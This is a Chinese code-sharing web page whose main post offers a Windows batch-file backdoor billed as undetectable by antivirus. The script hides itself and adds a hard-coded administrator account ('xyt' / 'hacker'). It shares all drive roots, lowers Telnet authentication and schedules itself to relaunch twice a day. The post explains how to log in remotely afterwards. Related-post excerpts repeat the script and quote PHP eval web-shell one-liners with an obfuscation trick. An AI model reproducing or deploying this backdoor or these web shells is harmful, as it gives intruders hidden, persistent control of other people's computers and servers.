用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
相关推荐
-
用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share
-
批处理bat之永不被杀的后门
代码如下: 复制代码 代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=
-
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _
-
用批处理写的后门 永不被杀
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net
-
用批处理实现Auto病毒专杀工具的代码
@ echo off color 0a mkdir c:\windows\system32\algssl.exe mkdir c:\windows\system32\msfir80.exe mkdir c:\windows\system32\msime80.exe attrib +s +r +h c:\windows\system32\algssl.exe attrib +s +r +h c:\windows\system32\msfir80.exe attrib +s +r +h c:\win
-
批处理写的电视机效果代码
复制代码 代码如下: @echo off title 收不到台的电视机 :a cls for /l %%b in (1,6,7)do ( color %%bf ) goto a
-
批处理写的 oracle 数据库备份还原工具
这是针对oracle编写的,可以用在不同的电脑上,因为它会自动读取当前电脑的环境变量,从而取得oracle的安装路径,唯一有一点不足的地方是程序中运行过程中会产生一个中间文本文件,不过这并不碍大事,备份或者还原完了以后将会自动删除产生文本文件,代码如下: 复制代码 代码如下: @echo off&setlocal enabledelayedexpansion color 0a :start for /f "tokens=2 delims==" %%a in ('path') d
-
写的不错批处理教程一
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
批处理入门与提高
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
tel.xls.vbs xls专杀工具
1.双击运行tel.xls.vbs即可消灭Trojan.Win32.Patched.v病毒. 2.本专杀使用VBS脚本编写,执行效率高,不过缺乏智能性,我也不愿去添加那些IF判断语句来进行智能判断,这没必要.只要是我分析的病毒而写出的对于专杀都是有效的,当然病毒变异了那就没办法了,任何专杀都是这样.有变种可以与我联系http://hi.baidu.com/ycosxhack. 3.学习如何用VBS写自己的专杀工具可以查看这里: http://hi.baidu.com/ycosxhack/blog
随机推荐
- SpringMVC自定义属性编辑器详解及实例
- ruby迭代map的简洁写法实现原理分析
- ExtJS 工具栏 分页事件参数
- Vue.js 父子组件通讯开发实例
- perl处理xml的模块介绍
- 数据挖掘之Apriori算法详解和Python实现代码分享
- python实现根据ip地址反向查找主机名称的方法
- 使用Python的Twisted框架编写非阻塞程序的代码示例
- Javascript数组与字典用法分析
- asp.net 页面回跳实现代码
- 利用Microsoft.XMLHTTP控件发送COOKIE
- 详解NodeJS框架express的路径映射(路由)功能及控制
- 约瑟夫问题的Python和C++求解方法
- PHP从FLV文件获取视频预览图的方法
- 网页设计常用的一些技巧
- Eclipse下使用ANT编译提示OutOfMemory的解决方法
- Eval 函数 | Execute 语句 | ExecuteGlobal 语句使用说明
- Android实现Gesture手势识别用法分析
- 实战SATA硬盘安装64位XP
- PHP实现的多维数组排序算法分析